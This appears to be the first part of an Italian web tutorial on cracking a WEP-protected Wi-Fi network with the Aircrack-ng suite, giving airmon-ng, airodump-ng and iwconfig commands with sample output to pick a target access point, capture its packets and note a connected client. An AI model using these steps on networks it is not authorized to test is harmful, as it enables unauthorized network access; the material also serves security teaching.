Nessun risultato. Prova con un altro termine.
Guide
Notizie
Software
Tutorial

Cracking WEP nella pratica - I

Un semplice esempio di cracking di una chiave WEP utilizzando la suite Aircrack-ng: prima parte
Un semplice esempio di cracking di una chiave WEP utilizzando la suite Aircrack-ng: prima parte
Link copiato negli appunti

Decisa la rete wireless target, per lanciare l'attacco che descriverò è necessario che:

  • vi sia almeno un client connesso all'access point; esistono metodologie per il cracking di reti senza client connessi: se interessati, rimando, al riguardo, al sito di aircrack-ng;
  • i segnali abbiano potenza sufficiente da poter (ricevere e) trasmettere dati. È da valutare la possibilità di costruire un'antenna direttiva adatta; di "moda" sono le antenne dette Pringles, appunto molto direttive e facili da implementare. Nel caso, rimanete attenti all'adattamento di impedenza tra il trasduttore, cioè l'antenna stessa, e la linea di trasmissione, cioè il "filo"; ho visto casi in cui l'adattatore D-LINK è stato inserito direttamente nel tubo di metallo, alla giusta distanza dalle estremità, così da evitare il problema delle riflessioni delle onde elettromagnetiche dovute alla diversa impedenza dell'interfaccia di discontinuità trasduttore/linea!;
  • l'algoritmo di cifratura dei dati utilizzato sia il WEP.

Come già accennato in precedenza, individuiamo gli AP non nascosti nelle vicinanze:

airmon-ng start rausb0 
airodump-ng rausb0 

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID 
                                                                                                                      
 00:1A:11:88:7B:EC    0       16        6    0  11  48  WEP  WEP         MyHOME                                        
 00:0F:B5:56:D9:86    0        6        0    0   2  54. WPA  TKIP   PSK  MYAccessP                           

[...]

L'AP di nostro interesse sia MyHOME, con BSSID 00:1A:11:88:7B:EC; esso trasmette utilizzando il canale 11 dello standard 802.11 (frequenze nell'intorno dei 2462MHz). La nostra interfaccia di rete wireless, con le adeguate caratteristiche già dette, sia rausb0.

Al fine di poter utilizzare le tecniche di criptoanalisi contro il WEP, è necessario catturare da qualche migliaio al mezzo milione di pacchetti dati (se la rete non è "affollata", questo porterà via parecchio tempo, per lo meno se non aumentiamo il traffico di rete con gli artifici che vedremo).

Diminuiamo per prima cosa il rate di trasmissione dati ad 1Mbit/s, di modo da diminuire conseguentemente la probabilità di errore.

iwconfig rausb0 rate 1M

Utilizziamo ora airodump-ng per catturare i pacchetti scambiati tra l'AP e gli host e salvarli conseguentemente in file *.cap:

airodump-ng --channel 11 --bssid 00:1A:11:88:7B:EC -w /tmp/dumpfile rausb0

Nel giro di pochi istanti compariranno i client connessi, con il loro indirizzo MAC. Prendiamo nota di uno tra questi; nell'esempio sottostante non abbiamo una così vasta scelta, e scegliamo (chi mai l'avrebbe detto..) la station 00:2F:03:A3:6F:3C.

 CH 11 ][ Elapsed: 52 s ][ 
                                                                                                                      
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID 
                                                                                                                      
 00:1A:11:88:7B:EC    0 100      503      163    4  11  48  WEP  WEP         MyHOME                                    
                                                                                                                       
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes                                              
                                                                                                                      
 00:1A:11:88:7B:EC  00:2F:03:A3:6F:3C    0   0- 0     0      206

Il programma visualizza client ed access point che si scambiano frame (non sappiamo ovviamente leggerne il contenuto). La velocità (unità per secondo) con cui vengono catturati questi pacchetti è generalmente piuttosto lenta.

Ti consigliamo anche